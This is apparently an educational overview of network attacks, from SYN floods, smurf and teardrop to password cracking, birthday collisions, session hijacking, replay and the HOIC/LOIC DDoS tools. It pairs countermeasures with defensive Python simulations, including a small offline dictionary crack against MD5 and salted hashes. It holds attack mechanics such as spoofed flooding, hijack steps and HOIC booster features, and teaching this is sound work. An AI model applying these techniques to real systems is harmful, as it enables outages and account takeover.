
In some instances, these DoS attacks are performed by many computers at the same time.
This scenario of attack is known as a Distributed Denial-of-Service Attack (DDoS). This
type of attack can be even more difficult to overcome due to the attacker appearing from
many different IP addresses around the world simultaneously, making determining the
source of the attack even more difficult for network administrators.

TCP SYN flood attack


In this attack, the attacker exploits the state a server keeps during the Transmission Control Protocol (TCP) three-way handshake. For each SYN it receives, the server allocates an entry in its queue of half-open connections and replies with a SYN-ACK. The attacker's device floods the target with SYNs, usually from spoofed source addresses, and never sends the final ACK. Each entry stays in the queue until it times out, so the small half-open queue fills up and the server drops SYNs from legitimate clients; the system does not necessarily crash, but nobody new can connect.

There are a few countermeasures to a TCP SYN flood attack:

 Enable SYN cookies on the server, so that it keeps no state for a half-open connection and instead encodes the connection details in the SYN-ACK's initial sequence number; state is allocated only when a valid ACK comes back. (On Linux this is the sysctl net.ipv4.tcp_syncookies.)

 Place servers behind a firewall or load balancer that proxies the handshake or rate-limits inbound SYNs, rather than one that blocks SYN packets outright, which would block every new connection.

 Increase the size of the half-open queue and decrease the timeout for half-open connections. This raises the flood rate the attacker needs but does not by itself stop a determined attacker.
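The following is an added example, not code from the original page: a toy model of a listener's half-open queue, with and without SYN cookies, under a flood of spoofed SYNs that are never acknowledged. The queue size, timeout, addresses and the cookie layout (8-bit time slot plus a 24-bit HMAC over the connection 4-tuple) are simplifications chosen for the demonstration; a real implementation also encodes the negotiated MSS and lives in the kernel.

```python
import hashlib
import hmac
import os
import random


class Listener:
    """Toy model of a TCP listener's half-open (SYN) queue with an optional
    SYN-cookie mode that stores nothing until the final ACK arrives."""

    def __init__(self, backlog=5, syn_timeout=60, syncookies=False):
        self.backlog = backlog
        self.syn_timeout = syn_timeout
        self.syncookies = syncookies
        self.secret = os.urandom(16)          # per-listener cookie secret
        self.half_open = {}                   # client -> (server ISN, created_at)
        self.established = set()

    def _cookie(self, client, t):
        # 32-bit ISN: high 8 bits are a coarse time slot, low 24 bits an HMAC
        # over the client address/port and the slot. Only a client that really
        # received the SYN-ACK at that address can echo it back as ack - 1.
        slot = (t // 64) & 0xFF
        mac = hmac.new(self.secret, f"{client}|{slot}".encode(), hashlib.sha256).digest()
        return (slot << 24) | int.from_bytes(mac[:3], "big")

    def _expire(self, now):
        self.half_open = {c: v for c, v in self.half_open.items()
                          if now - v[1] < self.syn_timeout}

    def on_syn(self, client, now):
        """Handle a SYN; return the server ISN sent in the SYN-ACK, or None if dropped."""
        if self.syncookies:
            return self._cookie(client, now)          # no queue entry at all
        self._expire(now)
        if len(self.half_open) >= self.backlog:
            return None                               # queue full: SYN dropped
        isn = random.getrandbits(32)
        self.half_open[client] = (isn, now)
        return isn

    def on_ack(self, client, ack, now):
        """Third handshake step; return True if the connection is established."""
        if self.syncookies:
            # Accept the current slot and the previous one (clock boundary).
            valid = {self._cookie(client, now), self._cookie(client, now - 64)}
            ok = ((ack - 1) & 0xFFFFFFFF) in valid
        else:
            entry = self.half_open.pop(client, None)
            ok = entry is not None and ack == entry[0] + 1
        if ok:
            self.established.add(client)
        return ok


def simulate(syncookies, attacker_syns=50):
    """Spoofed SYNs that are never ACKed, then one legitimate client connects."""
    srv = Listener(backlog=5, syn_timeout=60, syncookies=syncookies)
    now = 10_000
    for i in range(attacker_syns):
        srv.on_syn((f"203.0.113.{i % 250}", 40000 + i), now)   # spoofed sources
    legit = ("198.51.100.7", 51000)
    isn = srv.on_syn(legit, now + 1)
    if isn is None:
        return False                                          # legitimate SYN dropped
    return srv.on_ack(legit, isn + 1, now + 1)


if __name__ == "__main__":
    print("without SYN cookies, client connects:", simulate(False))   # False
    print("with SYN cookies, client connects:   ", simulate(True))    # True
```

The model shows why the "bigger queue, shorter timeout" advice only raises the bar: the attacker just sends more SYNs per second. With cookies the flood costs the server one HMAC per SYN and no memory, and a forged ACK from an address that never saw the SYN-ACK fails the check.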

Teardrop attack
This attack sends a sequence of Internet Protocol (IP) fragments whose length and fragment offset fields overlap one another. The attacked host tries to reassemble the fragments, and a reassembly routine that does not handle the overlap correctly corrupts memory and crashes or hangs the system.

The original teardrop affected operating systems of the late 1990s and has long been patched; a modern IP stack discards overlapping fragments. The advice to disable SMBv2 and block TCP ports 139 and 445 belongs to a separate, later Windows denial-of-service flaw in SMBv2 that was also nicknamed teardrop; it is a stop-gap for hosts that cannot yet be patched, and applying the vendor patch is the real fix in either case.

Smurf attack
This attack uses IP spoofing and ICMP to saturate a target network with traffic. The attacker sends ICMP echo requests to a network's broadcast address with the source address forged to be the victim's. For instance, if the intended victim is 10.0.0.10, the attacker sends an ICMP echo request that appears to come from 10.0.0.10 to the broadcast address 10.255.255.255. Every host on that network that answers sends its echo reply to 10.0.0.10, so a single request is amplified into one reply per host, and the victim's link is flooded. The process is repeatable and easily automated to generate huge amounts of congestion.

To protect your network from this attack, disable IP-directed broadcasts on the routers so that a packet addressed to a subnet's broadcast address from outside is dropped instead of forwarded (current router software does this by default). Also configure end systems not to answer ICMP echo requests sent to broadcast addresses; on Linux this is the sysctl net.ipv4.icmp_echo_ignore_broadcasts, which is enabled by default.

Ping of death attack


This attack pings a target with an IP packet whose reassembled size exceeds the maximum IP packet length of 65,535 bytes. A packet that large cannot be sent in one piece, so the attacker sends it as fragments whose offsets add up past the limit. When the target reassembles the fragments, the oversize result overflows the reassembly buffer and can crash the system.

Ping of death attacks are blocked by a firewall, or by a patched IP stack, that checks fragmented packets against the maximum size before reassembling them; all current operating systems do this.

Botnets
Botnets are the millions of systems infected with malware under hacker control in order to carry
out DDoS attacks. These bots or zombie systems are used to carry out attacks against the target
systems, often overwhelming the target system’s bandwidth and processing capabilities. These
DDoS attacks are difficult to trace because botnets are located in differing geographic locations.

Botnet-driven DDoS attacks can be mitigated by:

 RFC 3704 ingress filtering, which denies traffic from spoofed source addresses and helps ensure that traffic is traceable to its source network. For example, such a filter drops packets whose source is on the bogon list (unallocated or reserved address space) or, with strict unicast reverse-path forwarding, whose source address would not be routed back out of the interface it arrived on.
 Black-hole filtering, which drops undesirable traffic before it enters the protected network. When a DDoS attack is detected, the victim's BGP (Border Gateway Protocol) router announces the attacked prefix to its ISP's routers tagged so that all traffic heading to the victim's addresses is routed to a null0 interface at the next hop (remotely triggered black-holing). This keeps the flood off the victim's links at the cost of taking the attacked addresses offline for the duration.

A botnet, more generally, is a network of devices that have been infected with malicious software such as a worm or Trojan. Attackers control the botnet as a group without the owners' knowledge in order to increase the magnitude of their attacks; most often it is used to overwhelm systems in a distributed denial-of-service (DDoS) attack.

Password Attack
A password attack is any attempt to obtain or guess a user's password without authorisation, whether by capturing it in transit, recovering it from a stored hash, or guessing it outright.

Attackers use password sniffers, dictionary attacks and cracking programs. Defences include a password policy with a sensible minimum length and a ban on common or dictionary words, rate limiting and lockout on the login endpoint, storing passwords only as salted hashes computed with a deliberately slow function, and multi-factor authentication so that a guessed password alone is not enough. Forcing frequent password changes, long a staple of such policies, tends to push users toward predictable patterns and is no longer recommended by current guidance.

Offline password attacks work on password hashes stored in or exported from a computer system. Because a proper hash cannot be reversed, recovery is done by guessing: the cracking program hashes candidate after candidate and compares each result with the stored hash until one matches.

Eavesdropping Attack
Eavesdropping attacks start with the interception of network traffic.

An eavesdropping attack, also known as snooping or sniffing, is a network security attack in which an individual captures the information that smartphones, computers and other digital devices send or receive. It capitalises on unencrypted or weakly protected network transmissions to read the data in transit. Eavesdropping is difficult to detect because it causes no abnormal traffic of its own.

These attacks target weak transmissions between client and server that let the attacker receive the traffic. An attacker can install a network monitor such as a packet sniffer on a server, on a computer, or on any hop along the path and intercept data as it is transmitted. Every device between sender and receiver is a potential interception point, including the endpoints themselves. One way to defend against these attacks is to know what devices are connected to a network and what software runs on them.

Eavesdropping attacks begin with the interception of network traffic. By eavesdropping, an attacker can obtain passwords, credit card numbers and other confidential information that a user sends over the network. Eavesdropping can be passive or active:

 Passive eavesdropping: the attacker simply listens to the traffic as it passes through the network.
 Active eavesdropping: the attacker impersonates a friendly host and sends queries to the communicating parties to draw information out of them. This is called probing, scanning or tampering.

Detecting passive eavesdropping is, if anything, more important than spotting active attacks, because an active attack usually depends on knowledge of the friendly hosts that the attacker gathers beforehand through passive eavesdropping.

Encrypting data in transit (TLS, SSH, a VPN) is the primary countermeasure against eavesdropping.

Birthday attack
The birthday attack is a consequence of a statistical effect that makes finding collisions in one-way hash functions far cheaper than brute force. It is named for the birthday paradox: for a 50 percent chance that someone in a room shares your birthday you need 253 other people, but for a 50 percent chance that any two people in the room share a birthday you need only 23. The difference is that matches are counted over pairs. When you fix yourself as one half of every pair, n people give only n pairs, so you need 253 of them. When any pair counts, 23 people already form 23 x 22 / 2 = 253 pairs, and that many pairs, each with a 1 in 365 chance, is enough to reach roughly 50 percent. Thus 23, not 253, is the number you need for a 50 percent chance of some birthday match in the room. In general, a hash with N possible outputs can be expected to produce a collision after about the square root of N random inputs: roughly 2^64 trials for a 128-bit digest rather than 2^128.

Birthday attacks are made against hash algorithms used to verify the integrity of a message, software or digital signature. A message processed by a hash function produces a message digest (MD) of fixed length, independent of the length of the input, and the security of the scheme rests on it being infeasible to find two messages with the same digest. A birthday attack finds exactly that: the attacker generates many harmless-looking variants of a benign message and many variants of a malicious one (for instance by varying whitespace or wording) until one benign variant and one malicious variant hash to the same digest. The attacker then has the benign version signed, and the signature is equally valid for the malicious version; the receiver cannot detect the substitution even by comparing digests. This is why digest lengths are chosen so that the square root of the output space is still out of reach, and why hash functions with practical collision attacks such as MD5 and SHA-1 are no longer acceptable for signatures.
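The following is an added example, not code from the original page: it computes both birthday probabilities from the text (any pair versus a pair that includes you), finds the smallest group for a 50 percent chance of each, and then runs an actual birthday search against SHA-256 truncated to 32 bits, where a collision turns up after tens of thousands of trials rather than the 2^32 a preimage search would need. The message format `contract-v<i>` is a constructed stand-in for the attacker's document variants.

```python
import hashlib
import math


def p_any_pair_match(n, days=365):
    """P(at least two of n people share a birthday) = 1 - prod (days - i) / days."""
    p_distinct = 1.0
    for i in range(n):
        p_distinct *= (days - i) / days
    return 1.0 - p_distinct


def p_match_with_you(n, days=365):
    """P(at least one of n other people shares *your* birthday)."""
    return 1.0 - (1.0 - 1.0 / days) ** n


def smallest_n(target, prob_fn, days=365):
    """Smallest group size for which prob_fn reaches the target probability."""
    n = 1
    while prob_fn(n, days) < target:
        n += 1
    return n


def expected_trials(bits):
    """Expected random inputs before the first collision in a bits-wide digest."""
    return math.sqrt(math.pi / 2 * 2 ** bits)


def truncated_digest(message, bits):
    """Top `bits` bits of SHA-256, standing in for a short hash."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") >> (256 - bits)


def find_collision(bits=32):
    """Birthday search: two distinct messages with equal truncated digests.
    Returns (message_a, message_b, trials)."""
    seen = {}
    for i in range(1 << (bits // 2 + 8)):       # generous cap, ~2^24 for 32 bits
        m = f"contract-v{i}".encode()
        tag = truncated_digest(m, bits)
        if tag in seen:
            return seen[tag], m, i + 1
        seen[tag] = m
    raise RuntimeError("no collision within the trial cap")


def same_truncated_digest(a, b, bits):
    return truncated_digest(a, bits) == truncated_digest(b, bits)


if __name__ == "__main__":
    print("any pair, 50%:", smallest_n(0.5, p_any_pair_match))      # 23
    print("with you, 50%:", smallest_n(0.5, p_match_with_you))      # 253
    a, b, trials = find_collision(32)
    print(f"32-bit collision after {trials} trials "
          f"(expected about {expected_trials(32):.0f}, brute force 2^32)")
```

Memory is the practical limit of the naive search (one dictionary entry per trial); real collision finders use cycle-finding methods that need almost no memory, but the trial count is the same square-root figure.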

Brute-Force and Dictionary Network Attacks

Dictionary and brute-force attacks are attacks in which the attacker tries to log in to a user's account by systematically trying candidate passwords until the correct one is found.

The simplest way in is through the front door, since every system must provide some way of logging in. An attacker who holds valid credentials can enter as a regular user without creating suspicious logs, relying on an unpatched entry point, or tripping IDS signatures; an attacker who holds an administrator's or service account's credentials has an even easier time. That is why credentials are worth so much effort to attackers.

The term brute force means overpowering the system through repetition. A pure brute-force attack enumerates every possible combination, starting with single characters such as "a" and working up through longer strings, and is slow. A dictionary attack instead feeds in lists of likely passwords, whole words such as "snoop" or "snoopy" combined with thousands of common variations (capitalisation, appended digits, character substitutions), and succeeds far sooner against human-chosen passwords.

Against an online login endpoint, guessing is limited to perhaps 100 to 1,000 attempts per minute before rate limiting or lockout intervenes; against a stolen hash file, offline cracking can test millions or billions of candidates per second. Given enough attempts, any password that is short or drawn from a wordlist will fall, which is why strong, unique passwords, slow password hashing and multi-factor authentication matter most on critical resources such as network switches, routers and servers.
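The following is an added example, not code from the original page: an offline dictionary attack run against the same three accounts stored two ways, as unsalted MD5 and as salted PBKDF2-HMAC-SHA256. It counts the hash operations the attacker must perform in each case to show why salting plus a slow function, not password length alone, is what blunts this attack. The users, passwords and wordlist are constructed; the iteration count is kept low so the demonstration runs quickly.

```python
import hashlib
import os

# Constructed wordlist, in the order a cracker would try it.
WORDLIST = ["password", "123456", "letmein", "snoop", "snoopy", "qwerty", "hunter2"]


def fast_hash(password):
    """Unsalted, fast hash: the worst way to store a password."""
    return hashlib.md5(password.encode()).hexdigest()


def slow_hash(password, salt, iterations):
    """Salted, deliberately slow key derivation (PBKDF2-HMAC-SHA256)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


def crack_unsalted(targets):
    """One pass over the wordlist cracks every account at once: with no salt,
    a precomputed table (or one hashing run) serves for all users."""
    table = {fast_hash(w): w for w in WORDLIST}
    found = {user: table.get(digest) for user, digest in targets.items()}
    return found, len(WORDLIST)


def crack_salted(targets, iterations):
    """Per-user salt forces a fresh slow computation for every (user, word)."""
    found, ops = {}, 0
    for user, (salt, digest) in targets.items():
        found[user] = None
        for w in WORDLIST:
            ops += 1
            if slow_hash(w, salt, iterations) == digest:
                found[user] = w
                break
    return found, ops


def demo(iterations=20_000):
    users = {"alice": "snoopy", "bob": "letmein", "carol": "correct horse staple"}
    unsalted = {u: fast_hash(p) for u, p in users.items()}
    salts = {u: os.urandom(16) for u in users}
    salted = {u: (salts[u], slow_hash(p, salts[u], iterations)) for u, p in users.items()}
    found_fast, ops_fast = crack_unsalted(unsalted)
    found_slow, ops_slow = crack_salted(salted, iterations)
    return found_fast, ops_fast, found_slow, ops_slow


if __name__ == "__main__":
    found_fast, ops_fast, found_slow, ops_slow = demo()
    print("unsalted MD5:", found_fast, "hash ops:", ops_fast)
    print("salted PBKDF2:", found_slow, "hash ops:", ops_slow)
```

Both runs recover the two wordlist passwords and miss the passphrase; the difference is cost. Unsalted, the attacker hashes the wordlist once for the whole user table. Salted, every user costs a fresh pass, and each PBKDF2 call is tens of thousands of times slower than MD5, so the same wordlist against a large breach takes correspondingly longer. Production systems use far higher iteration counts, or memory-hard functions such as Argon2 or scrypt, to push that cost up further.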

Insider Threats
Not every network attack is performed by someone outside an organization.

Inside attacks are malicious attacks performed on a computer system or network by an individual
authorized to access the system. Insiders that carry out these attacks have the edge over external
attackers since they have authorized system access. They may also understand the system
policies and network architecture. Furthermore, there is less security against insider attacks since
most organizations focus on defending against external attacks.

Insider threats can affect every element of computer security and range from planting Trojans to stealing sensitive data from a network or system. An insider can also attack availability by overloading the network, the processing capacity or the storage of a system until it fails.

Man-in-the-Middle (MITM) Attacks


Man-in-the-middle (MitM) attacks, a form of active eavesdropping, occur when attackers insert themselves into a two-party transaction. Once the attackers are relaying the traffic, they can read, filter and alter the data passing in either direction.

Two common points of entry for MitM attacks:

1. On unsecure public Wi-Fi, attackers can insert themselves between a visitor’s device and the
network. Without knowing, the visitor passes all information through the attacker.

2. Once malware has breached a device, an attacker can install software to process all of the
victim’s information.

Man-in-the-middle (MITM) attacks are a type of security breach that allows an attacker to eavesdrop on a communication between two entities. The attacker sits between two legitimate communicating parties and intercepts communication they should otherwise not be able to access, hence the name. In the classic cryptographic version, the attacker "listens" to the conversation by intercepting the public-key exchange and retransmitting it with the requested key replaced by his own.

The two parties seem to communicate as usual, unaware that their messages pass through an unknown perpetrator who can read and modify them before they reach the receiver. Thus the intruder controls the whole communication.

AI-Powered Attacks
The concept of a computer program learning by itself, building knowledge, and getting more sophisticated may be unsettling.

Artificial intelligence can be easily dismissed as another tech buzzword. However, it is already being employed in everyday applications through an algorithmic process referred to as machine learning. Machine learning trains a computer to perform particular tasks on its own: the system is run on the task repeatedly and adjusts itself against the errors and obstacles it encounters.

AI can be used to find and exploit weaknesses in many systems, including autonomous vehicles and drones, turning them into potential weapons. It makes attacks such as identity theft, password cracking and denial-of-service more automated, more powerful and more efficient. Larger attacks could affect national security, shut down hospitals or cut power supplies to entire regions, with physical, financial and emotional harm to the people who depend on those systems.

Session Hijacking and Man-in-the-Middle Attacks


When you're on the internet, your computer has a lot of small back-and-forth transactions
with servers around the world letting them know who you are and requesting specific
websites or services. In return, if everything goes as it should, the web servers should
respond to your request by giving you the information you're accessing. This process, or
session, happens whether you are simply browsing or when you are logging into a website
with your username and password.

The session between your computer and the remote web server is given a unique session ID,
which should stay private between the two parties; however, an attacker can hijack the
session by capturing the session ID and posing as the computer making a request, allowing
them to log in as an unsuspecting user and gain access to unauthorized information on the
web server. There are a number of methods an attacker can use to steal the session ID, such
as a cross-site scripting attack used to hijack session IDs.

An attacker can also use a hijacked session to insert themselves between the requesting computer and the remote server, pretending to each to be the other party. This allows them to intercept information in both directions and is commonly called a man-in-the-middle attack.

In this type of MitM attack, an attacker hijacks an established TCP session between a trusted client and a network server. The attacking computer spoofs the trusted client's IP address and supplies the correct TCP sequence numbers, so the server continues the session believing it is still communicating with the client. For instance, the attack might unfold like this:

1. A client connects to a server.
2. The attacker's computer gains control of the client, or of a position on the path from which it can observe the client's traffic.
3. The attacker's computer knocks the client off the session, for example with a reset or a flood that keeps it from responding.
4. The attacker's computer sends packets with the client's IP address as their source and the client's current sequence numbers.
5. The attacker's computer continues the dialogue with the server, which believes it is still communicating with the client.

Because current operating systems randomise initial sequence numbers, guessing them blindly is impractical; a working hijack of this kind requires the attacker to observe the traffic, which is why it is usually paired with a position on the path, such as a compromised Wi-Fi access point.
Credential Reuse

Users today have so many logins and passwords to remember that it’s tempting to reuse
credentials here or there to make life a little easier. Even though security best practices
universally recommend that you have unique passwords for all your applications and
websites, many people still reuse their passwords—a fact attackers rely on.

Once attackers have a collection of usernames and passwords from a breached website or service (easily acquired on any number of black-market sites), they know that if they try the same credentials on other websites there is a fair chance some will work; doing this at scale is called credential stuffing. No matter how tempting it may be to reuse credentials for your email, bank account and your favourite sports forum, it is possible that one day the forum will get hacked, giving an attacker easy access to your email and bank account. When it comes to credentials, variety is essential. Password managers can be a great help in keeping a unique credential for every site, and multi-factor authentication limits the damage when a reused password does leak.

This is just a selection of common attack types and techniques; web application vulnerabilities in particular are a much larger subject of their own. It is not intended to be exhaustive, and attackers evolve and develop new methods as needed; however, being aware of and mitigating these types of attack will significantly improve your security posture.

IP Spoofing
IP spoofing is used by an attacker to convince a system that it is communicating with a known,
trusted entity and provide the attacker with access to the system. The attacker sends a packet
with the IP source address of a known, trusted host instead of its own IP source address to a
target host. The target host might accept the packet and act upon it.

Replay
A replay attack occurs when an attacker captures valid messages and later resends them, impersonating one of the participants, for instance to repeat a payment or reuse a recorded authentication exchange. It can be countered with session timestamps or a nonce (a random, single-use value bound to each message by a MAC or signature), so that the receiver rejects anything that is stale or has already been seen.
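The following is an added example, not code from the original page: a receiver-side check that combines both countermeasures from the text. Every message carries a timestamp, a random nonce and an HMAC over both plus the body; a replayed message fails because its nonce was already accepted, an old capture fails because it is outside the freshness window, and a modified one fails the MAC. The shared key and the injectable clock are assumptions for the demonstration.

```python
import hashlib
import hmac
import json
import os
import time


class ReplayGuard:
    """Seals outgoing messages and verifies incoming ones for a shared key.
    Both ends of the channel use the same class with the same key."""

    def __init__(self, key, window=30, clock=time.time):
        self.key = key
        self.window = window          # seconds a message stays fresh
        self.clock = clock            # injectable for testing
        self.seen = {}                # nonce -> timestamp of accepted messages

    def _tag(self, ts, nonce, body):
        data = f"{ts}|{nonce}|{body}".encode()
        return hmac.new(self.key, data, hashlib.sha256).hexdigest()

    def seal(self, body):
        """Sender side: attach timestamp, fresh nonce and MAC."""
        ts, nonce = int(self.clock()), os.urandom(16).hex()
        return json.dumps({"ts": ts, "nonce": nonce, "body": body,
                           "mac": self._tag(ts, nonce, body)})

    def verify(self, wire):
        """Receiver side: returns 'ok', 'bad_mac', 'stale' or 'replay'."""
        msg = json.loads(wire)
        now = int(self.clock())
        # Forget nonces older than the window: anything that old fails the
        # freshness check anyway, so the set stays bounded under load.
        self.seen = {n: t for n, t in self.seen.items() if now - t <= self.window}
        expected = self._tag(msg["ts"], msg["nonce"], msg["body"])
        if not hmac.compare_digest(expected, msg["mac"]):
            return "bad_mac"          # body, timestamp or nonce was altered
        if abs(now - msg["ts"]) > self.window:
            return "stale"            # captured long ago, outside the window
        if msg["nonce"] in self.seen:
            return "replay"           # same message already accepted once
        self.seen[msg["nonce"]] = msg["ts"]
        return "ok"


if __name__ == "__main__":
    guard = ReplayGuard(b"shared-secret-key")
    wire = guard.seal("transfer 100 to bob")
    print(guard.verify(wire))   # ok
    print(guard.verify(wire))   # replay
```

The MAC is checked before the timestamp and nonce so that an attacker cannot use the responses to learn which nonces the receiver has stored. The timestamp alone would not stop a replay inside the window, and the nonce alone would force the receiver to remember nonces forever; together they give a bounded memory and a firm cut-off.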

Currently, there is no single technology or configuration that prevents all MitM attacks. Generally, encryption and digital certificates provide an effective safeguard, assuring both the confidentiality and the integrity of communications. But a man-in-the-middle can be inserted into a communication in a way that encryption alone does not help with. For example, attacker "A" intercepts the public key of person "P" and substitutes his own public key for it. Anyone who then wants to send P an encrypted message using P's public key is unknowingly using A's. A can therefore read the message intended for P, re-encrypt it with P's real public key and send it on, and P never notices that the message was exposed. A could also modify the message before resending it. P is using encryption and believes the information is protected, but it is not, because the key he relies on was swapped.

So, how can you make sure that P's public key belongs to P and not to A? Certificate authorities, which vouch for the binding between a key and its owner, together with hash functions and digital signatures were created to solve this problem. When person 2 (P2) wants to send a message to P, and P wants to be sure that A has neither read nor modified it and that it actually came from P2, the following method is used:

1. P2 creates a symmetric key and encrypts it with P's public key.
2. P2 sends the encrypted symmetric key to P.
3. P2 computes a hash of the message and digitally signs it with his own private key.
4. P2 encrypts the message and the signed hash with the symmetric key and sends the result to P.
5. P recovers the symmetric key from P2's transmission, because only he holds the private key that decrypts it.
6. P, and only P, can decrypt the symmetrically encrypted message and signed hash, because only he has the symmetric key.
7. P verifies that the message has not been altered by computing the hash of the received message and comparing it with the digitally signed one.
8. P also satisfies himself that P2 was the sender, because only P2 can produce a signature that verifies with P2's public key.

The signature in steps 7 and 8 detects any modification regardless of what A did with the keys, but step 1 only keeps the message confidential if P2 really has P's public key rather than A's; that is the part a certificate authority's signature on P's key is there to guarantee.
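The following is an added example, not code from the original page: the eight steps above implemented with the third-party `cryptography` package (RSA-OAEP to wrap the symmetric key, AES-GCM for the message, RSA-PSS for the signature, all assumptions about algorithm choice since the text names none), followed by the key-substitution attack from the previous section. The parties P, P2 and A, the message, and the 2-byte length prefix used to pack signature and message together are constructed for the demonstration.

```python
import os

from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

OAEP = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)
PSS = padding.PSS(mgf=padding.MGF1(hashes.SHA256()),
                  salt_length=padding.PSS.MAX_LENGTH)


def make_keypair():
    return rsa.generate_private_key(public_exponent=65537, key_size=2048)


def sign(message, sender_priv):
    # Step 3: hash the message and sign the hash (PSS hashes internally).
    return sender_priv.sign(message, PSS, hashes.SHA256())


def seal(message, signature, receiver_pub):
    # Steps 1, 2 and 4: a fresh symmetric key wrapped under the receiver's
    # public key; message and signature encrypted under the symmetric key.
    sym_key = AESGCM.generate_key(bit_length=256)
    nonce = os.urandom(12)
    body = len(signature).to_bytes(2, "big") + signature + message
    return {"wrapped_key": receiver_pub.encrypt(sym_key, OAEP),
            "nonce": nonce,
            "ciphertext": AESGCM(sym_key).encrypt(nonce, body, None)}


def open_envelope(env, receiver_priv):
    # Steps 5 and 6: only the holder of the private key recovers the symmetric
    # key, and only that key decrypts the body. Returns (signature, message).
    sym_key = receiver_priv.decrypt(env["wrapped_key"], OAEP)
    body = AESGCM(sym_key).decrypt(env["nonce"], env["ciphertext"], None)
    n = int.from_bytes(body[:2], "big")
    return body[2:2 + n], body[2 + n:]


def receive(env, receiver_priv, sender_pub):
    # Steps 7 and 8: verify the signature with the claimed sender's public key;
    # raises InvalidSignature if message or signature was altered.
    signature, message = open_envelope(env, receiver_priv)
    sender_pub.verify(signature, message, PSS, hashes.SHA256())
    return message


def demo():
    p, p2, a = make_keypair(), make_keypair(), make_keypair()
    msg = b"pay 100 to P2"
    sig = sign(msg, p2)
    honest = receive(seal(msg, sig, p.public_key()), p, p2.public_key())

    # Key substitution: P2 was handed A's public key as "P's", so P2 seals
    # for A and A can open the envelope and read the message.
    a_sig, a_msg = open_envelope(seal(msg, sig, a.public_key()), a)
    # A can re-seal the unmodified message for P, and P accepts it (A read it
    # without being detected)...
    forwarded = receive(seal(a_msg, a_sig, p.public_key()), p, p2.public_key())
    # ...but any change to the message is caught, because A cannot sign as P2.
    try:
        receive(seal(b"pay 100 to A", a_sig, p.public_key()), p, p2.public_key())
        tamper_detected = False
    except InvalidSignature:
        tamper_detected = True
    return honest, a_msg, forwarded, tamper_detected


if __name__ == "__main__":
    print(demo())
```

The run makes the division of labour visible: the signature protects integrity and origin no matter which public key P2 was tricked into using, while confidentiality is only as good as P2's knowledge of P's real key, which is what a certificate from a trusted authority is there to establish.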

What is High Orbit Ion Cannon (HOIC)

High Orbit Ion Cannon (HOIC) is a free, open-source network stress application developed by
Anonymous, a hacktivist collective, to replace the Low Orbit Ion Cannon (LOIC). Used
for denial of service (DoS) and distributed denial of service (DDoS) attacks, it functions by
flooding target systems with junk HTTP GET and POST requests. HOIC was designed to
improve upon several LOIC application flaws, including:

 Detection – HOIC uses booster scripts that randomise the headers of attack requests (User-Agent, Referer and the like), so traffic from one user is harder to fingerprint and filter. The scripts do not hide the attacker's IP address: requests are sent directly, so the source address remains visible to the target. LOIC has no obfuscation of any kind.
 Firepower – An individual HOIC user can launch a significant number of junk requests at a given time; as few as 50 perpetrators can execute a successful DDoS attack. This differs from LOIC, which requires thousands of users to coordinate and launch an attack.
Anonymous first used HOIC in 2012 during Operation Megaupload — at the time one of the
largest DDoS assaults ever recorded. It was launched in retaliation for the shutting down of
Megaupload, a filesharing website, and targeted websites belonging to the U.S. Department of
Justice, the Recording Industry Association of America, the Motion Picture Association of
America and Broadcast Music, Inc.

Attack description
Widespread HOIC availability means that users having limited knowledge and experience can
execute potentially significant DDoS attacks. The application can open up to 256 simultaneous
attack sessions at once, bringing down a target system by sending a continuous stream of junk
traffic until legitimate requests are no longer able to be processed.
Unlike LOIC, which is able to launch TCP, UDP and HTTP GET floods, HOIC conducts attacks
based solely on HTTP GET and POST requests.

Add-on scripts called boosters—not available in the LOIC application—can greatly increase
attack magnitude. Boosters also let HOIC users customize the application and randomize assaults
in order to circumvent caching mechanisms that protect servers from traffic spikes.

Despite booster use, the attack traffic amount generated by HOIC is still not enough for a single
user to take down a target system. A successful DDoS assault can only be launched when a team
of perpetrators operate HOIC simultaneously. A high degree of coordination is required among
several users.

The Low Orbit Ion Cannon (LOIC) is the older tool for the same purpose. It floods the target with TCP or UDP packets, or with HTTP requests, so that the server is kept busy; in the TCP/UDP modes the user can also set flags such as SYN, URG, FIN and ACK.

LOIC's "Hive Mind" mode lets volunteers hand control of their copy to an IRC channel, so that one operator can point many machines at a target at once, which makes the group behave like an opt-in botnet. When the user starts the attack and sets the number of threads, each thread opens connections and sends requests as fast as it can; with enough participants the server spends all of its resources answering junk requests, legitimate users are starved out, and after some time the CPU is saturated. Keeping requests deliberately incomplete so that the server sits waiting on them is a different technique, a "slow HTTP" attack, from LOIC's plain flood.
